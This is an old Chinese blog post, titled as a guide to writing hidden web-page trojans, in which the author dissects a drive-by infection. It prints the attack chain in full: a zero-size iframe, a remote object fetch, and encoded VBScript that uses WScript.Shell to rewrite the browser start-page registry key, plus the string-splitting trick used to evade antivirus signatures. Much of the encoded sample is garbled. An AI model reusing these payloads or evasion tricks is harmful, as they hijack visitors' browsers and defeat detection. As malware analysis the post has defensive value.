正文

如何写隐藏的网页病毒木马2006-02-22 12:39:00

【评论】 【打印】 【字体: 】 本文链接:http://blog.pfan.cn/xboy/10384.html

分享到:

--------------------------------------------------------------------------------
文章作者:     文章来源:网络共享     发布时间:2005-05-08 07:49:05 
注:本文只是大家学习知识的一个平台,请勿恶意之用!

今上在网上浏览网页的时候,在不知不觉中,中了网页病毒,我本来是开着瑞星杀毒的,也是昨天才升级的
却一点也没反应说有毒入侵,在经过一番折腾之后,终于明白他的机理.记录如下
[第一步]
我首先有用flashget下载了有病毒的网页,看源文件,里头有这一行代码
<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
这一行代码,好明显是说明不显示网页中,却它在网页中,说明不怀好意~~~~
[第二步]
我接着再用flashget 下载上面的http://my.5e163.com/ie.htm,再看源代码
只有四句
<html>
<object data="http://my.5e163.com/com88.test">
</object>
</html>
[第三步]
再下载http://my.5e163.com/com88.test得出如下代码
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript.Encode">
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"geUl "http://my.5e163.com"
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\I-2../=ut2r"="-..26"&ut wL&"xp'&OG7]i\"W]\ZcL&'i-2.-\VtO\O5rO#O% Pai&/]e' 9/b-t\A"Imy.4W16I4_TT"
B|Z-RWg6ritP L*u&"K"j'(|ST/jLftwi&/crKvhsu="_]T'&"sfx"&/rv3J"&'-6]'&On2"&"- p/="xp'&OmTt"j/W]\Mai&/AnF^W/=ua]_bBPa"dOge/'TOMtt3aLyPy4521632cfTu
Esb-!6gItA%e "?"#OKLj/;pSfLj'ftwLj"atWvhs"&'$*f'&Osff"&utvW~"&"9eG'j/nW/jLt Ei&/yp'dOG7V"dLWz\MaLj"iJ=}Wk"&'HGk9_#"d"agP_"tu&"l',9'b]t#}"ymy.:e7e3-_TTu
mCb-Reg6Git69L+/&"7sid'U=Sf"&"otm/="arK\h"O#"NtTL&"sPf/j"9v3Ju="%2G'&"n2O&"]9pO#"x3ugSmoG"d"erpT5Fu&"e#U!/i|uG/jLl1"J"Mrt3A"Aw/.42}e3.cfF"
LCb8Re&2..-Git2 uaO#"7qL#u =SD"&"x]Bi&"a]6|hO/g"lrT/&"i4f"=Lrv1-2.2'&"te*L\"~ei#u%9+L&"x3O#UFDG/&"eV&TA#Lg/eJVzu#OLLvGr'="l.O,Lht%#5//my(4K1W3(a7#O
wsh-!6g2-2-rA]PTO%Od"KCO#L(|~7/gLo]L/="c]2\v|O#LNz7Lg/iofL\u]\b="=Ltezuj/nK"j/-TB'jLxp"j/kTtO=/6]poM/="#2}UudOY,O\uC&'O&"]mDi,'Zt-\:/IwM85K1eI2_TPO
wsb8;WXIVs]2,/+/="P!L&uS=~fO\u8]PO&":zP&M"L&u_ro'=Oo4"j/-v3SOd"teG/dOJWu#i%,3O#ux#Ld"FfG/dOKVvZ5O&"|Sp\i'd"VCt %7O#"Pe9KHLj']2","b]%#}"3TN-y6}(D.Nf#"
LZ4[PF1tAteT'|i&'`Cud"UFUT/&'frPudO*G2\MiO#LNtTu#iC7kO#ut=1="=Lr6]O\u=6/j"tT+ug"p\"=Llozuj/ez\h5udO"2..-\gi]O#"i][H"&"Dmi&"e P:O\L]6"J"htr\~A3#/-:6I'32aTm'
msh2ze&W*ite,"aO#"P0i&"U\Voi&"ftwLj':G6\momiN|6pNO'g/$]ou#OsDo"d"9p/n'&iteru&L2-226Lg"t,3OduOx/="$4]O\"6]|q7"d"n]r'd'7c{T5O=/2-.26u&OG\H"&"7T6u&"TaLg"XW/'"1i 'RwGaDI"Ro"
wCh-%2]e*s-2BuH"=/PLj/;\~4"&"ftB/guarP\N)"#OaGo"gLLoO"\"r|W)"#On}P'=SF&0ud'qrru#OK=rzP"j/rsi"&u4.2-2pRL&O'2-2.\1w/j"XP,u#OiR+4EIw',["Ww;T,ORE.kbkBht9p~3AF5.xW1(32cow/
Lb.R6g6*sre "a1/jLC'j"S&Voi&/O9ud"wa"=/VK&M"ci=/Gf"\Os4fu&"-|1iO#u-2.2}P/&iws\Cur"d"rPni#"])6i#"*Lu#OionFe7mOdusNiL&"PL&Sxu="C"&"-e"&O#&$i|"&"abl"d"e%ei#"0Oi#"]zu#OyToDL='$CuBO1L,"%+k_$22-.O!$u
wiZ.Re0Wt)te,L?/="e!'=iU|nD"g/ftBu#O5*eFMiu&"c]ou&"C74O&/t\3Ju#OtW]"&".2-.e/jL]BEOd"f#L='c4ri\"er\MH'dOs2.2-\..-2iS"j/&ow PA]u\O访问,hHRXF+&R1WsROr@#@&hbx[GSRm^G/@#@&eC4CAA==^#~@问,hHRXF+&R1WsROr@#@&hbx[GSRm^G/@#@&eC4CAA==^#~@</script>
<script LANGUAGE="VBscript.Encode">
on error resume -2..6#-
CaFl ,f2-2-jFe)7AddF*vTtO%6L(O【音乐影视】Sl'b%t3://mx4xW1eE89oTOV
C_km  4njFei_A}Jmav7ri]2s("【上万首音乐】Um"b]-\~I/F5.xWK6$.com/5

TJ[etGfGBr6CCmW{nPxt
C:$G L7ng\2i_Ad#DWl%P3(O音乐影视Sl'b%t3://mx4xW1eE89oTOV
C_km  4njFei_A}J$esltox{"上万首音乐Ul"htrFayLPy44eWe/.lom")

oS96*r4GTGKsG#K 2-.26#-
!cml Lf2..-jFei7/j&Xu"NkL:u~_bU" 娱乐明星网tLBuhrt3://Fx2:e16/(aTw/4
CcGl  4ngg2A7)d&Qui_fwH"nlb("B上万首音乐]u OMt9#AA3PM.xe16E8$Pm")

g'.2-2c9|PnB"onFpe|_A}JXavor)%Ks4NJ{;V
son KGtoVBG6sumP[nKy%
 ~6],~9=Bm|h-sre:re^ho]rlut(w|Z-SEe9sHkpDkderL6VFH|Ttite i)BkTiA"9H[M{k"-SzL'A
s~.ParFW9Path[&BU^
LU-~*Me()
LSP99~l =,,sh4!*6ar6nb4Gtl"](E h.^#e_iakpDlder|{'FHvPtO%WLL) +BOA链接/uBk{N +u(U[ L4
;~c2ocr&2]P*-h &9U
 ^$-Save'V
knD{g"2-.-$%ioS

Xu2-2.c9iPn L7-.2-gp6|`Ad&$WCl%PF4N'{S5
UfJ9Pr]or[rKCCw6{~6y-
LSPt ^,J9msM4sr2Hte~Mf*tcq]6m Z(~EeNs:$Xoc}6G (LAlcUL2z o6 +r7FO`  "yuBkTN{ku.S%L"5
US. 5GFP%m5-h9\T(v
s~4UaMe(4OkKx@#@&@#@&rBEBAA==^#~@Ecj]dJ*@#@&i?cPlMonYhlO4,'P`7@#@&d?cjC\`*@#@&2U[,s;x1OkKx@#@&@#@&rBEBAA==^#~@</script>
<script language="Jscript.Encode">
fu-2-2cti4.2-2TNmo|2"t6` (
setPATeoqt(iCelf.llTP{4',aV
:
llosesr==^#~@@&)@#@&^sK/nkDc*@#@&ARUAAA==^#~@</script>
</html>
一片乱七八糟,但其中的有一个关键字,引起我的注意 LANGUAGE="VBscript.Encode",于是我就顺腾摸瓜,上网找了一下,这方面的资料,
原来encode是用来加密了脚本的,但找了好一阵子,都没有这方面的解密软件,而加密的就有好多了,而只是在
http://www.china100.net/java1.htm
找到在线解密的网页,于是他上面的乱七八糟的代码复制到该网页的输入框,解码成功
然后我将解码后的代码复印到记事本中,
得代码如下
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>


<script language="Jscript">
function closeit() {
setTimeout("self.close()",5)
}
closeit()
</script>
</html>

从上面的代码中,可以很容易的发现,他是写入注册表的,而且是用了词组分解来避开杀毒软件对特征码的查杀,
总结一下,该网页病毒用了病毒惯用手法,
1。隐藏网页,将网页引向深层,而且用了<object data="http://my.5e163.com/com88.test">等隐藏身份
2。加密,这不用说了,
3。词组分解,

wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://my.5e163.com"
写成
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "http://my.5e163.com"
等等,来避开杀毒软件。
 

阅读(2398) | 评论(0)


版权声明:编程爱好者网站为此博客服务提供商,如本文牵涉到版权问题,编程爱好者网站不承担相关责任,如有版权问题请直接与本文作者联系解决。谢谢!

评论

暂无评论
您需要登录后才能评论,请 登录 或者 注册